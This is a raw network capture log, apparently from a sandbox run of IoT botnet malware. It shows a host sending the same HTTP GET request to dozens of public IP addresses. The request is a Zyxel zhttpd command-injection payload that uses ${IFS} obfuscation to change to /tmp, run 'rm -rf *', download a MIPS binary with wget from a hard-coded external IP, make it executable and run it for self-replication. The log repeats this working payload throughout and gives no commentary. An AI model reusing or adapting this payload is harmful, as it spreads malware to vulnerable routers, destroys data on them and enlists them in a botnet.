                              Mar 31, 2024 08:41:45.082386971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6363192.168.2.1353442107.87.215.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.082464933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6364192.168.2.1336344115.152.95.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.082535982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6365192.168.2.1351544202.81.166.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.082602978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6366192.168.2.1342740103.222.94.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.082690001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6367192.168.2.1354092184.110.76.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.082750082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6368192.168.2.133649285.26.2.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.082818985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6369192.168.2.1344718186.224.20.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.082880974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6370192.168.2.1338704171.198.100.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.082942009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6371192.168.2.135099479.77.81.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.083041906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6372192.168.2.1354180130.208.50.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.083122015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6373192.168.2.13459464.64.201.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.083175898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6374192.168.2.135110448.95.49.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.083244085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6375192.168.2.1336722171.177.175.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.083306074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6376192.168.2.1333470183.69.246.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.083389997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6377192.168.2.1349918132.254.29.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.083427906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6378192.168.2.1340416190.93.194.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.083476067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6379192.168.2.1354422175.83.89.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.083534956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6380192.168.2.1353870104.175.108.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.083586931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6381192.168.2.1358036201.133.164.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.083662987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6382192.168.2.133910272.81.56.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.083733082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6383192.168.2.134136627.15.96.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.083813906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6384192.168.2.1336372106.203.180.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.090266943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6385192.168.2.1354228120.116.154.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.090327024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6386192.168.2.13510608.248.65.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.090395927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6387192.168.2.1349052156.98.25.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.090461969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6388192.168.2.133600681.38.142.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.090498924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6389192.168.2.1336054170.0.121.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.090562105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6390192.168.2.135943478.232.16.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.078773975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6391192.168.2.133664482.70.138.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.078850985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6392192.168.2.135009879.77.142.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.078896999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6393192.168.2.1347118162.222.125.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.078957081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6394192.168.2.1342060221.184.92.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079045057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6395192.168.2.1356128117.205.1.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079077959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6396192.168.2.133736625.78.23.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079113960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6397192.168.2.1354408156.136.253.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079157114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6398192.168.2.134338498.255.245.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079193115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6399192.168.2.1351564104.50.146.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079257965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6400192.168.2.134480486.235.240.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079286098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6401192.168.2.133366251.155.11.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079332113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6402192.168.2.133689494.207.96.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079377890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6403192.168.2.133661273.224.16.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079416037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6404192.168.2.133404238.164.91.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079468012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6405192.168.2.1345150196.182.78.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079569101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6406192.168.2.134052694.76.247.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079576969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6407192.168.2.1337722168.228.109.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079592943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6408192.168.2.1333248185.155.127.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079631090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6409192.168.2.135319489.111.165.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079669952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6410192.168.2.1350608209.78.186.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079719067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6411192.168.2.1340382187.113.251.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079731941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6412192.168.2.1340128106.46.114.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079787016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6413192.168.2.133334493.40.179.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079797029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6414192.168.2.1351024138.8.132.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079862118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6415192.168.2.134566887.155.144.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079916000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6416192.168.2.135122863.72.20.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079946995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6417192.168.2.135717276.39.27.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.079983950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6418192.168.2.13413649.108.124.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080034018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6419192.168.2.134533060.167.228.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080079079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6420192.168.2.133625672.189.78.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080126047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6421192.168.2.13561908.89.145.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080166101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6422192.168.2.1356460173.157.196.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080198050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6423192.168.2.133946857.216.115.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080245018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6424192.168.2.1344306120.70.108.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080249071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6425192.168.2.13337668.254.115.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080308914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6426192.168.2.1338896212.55.212.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080359936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6427192.168.2.1351850154.142.228.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080399036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6428192.168.2.134032482.8.30.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080455065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6429192.168.2.135877838.198.90.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080497980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6430192.168.2.134122665.222.37.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080535889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6431192.168.2.1332778153.122.113.89443
                              TimestampBytes transferredDirectionData
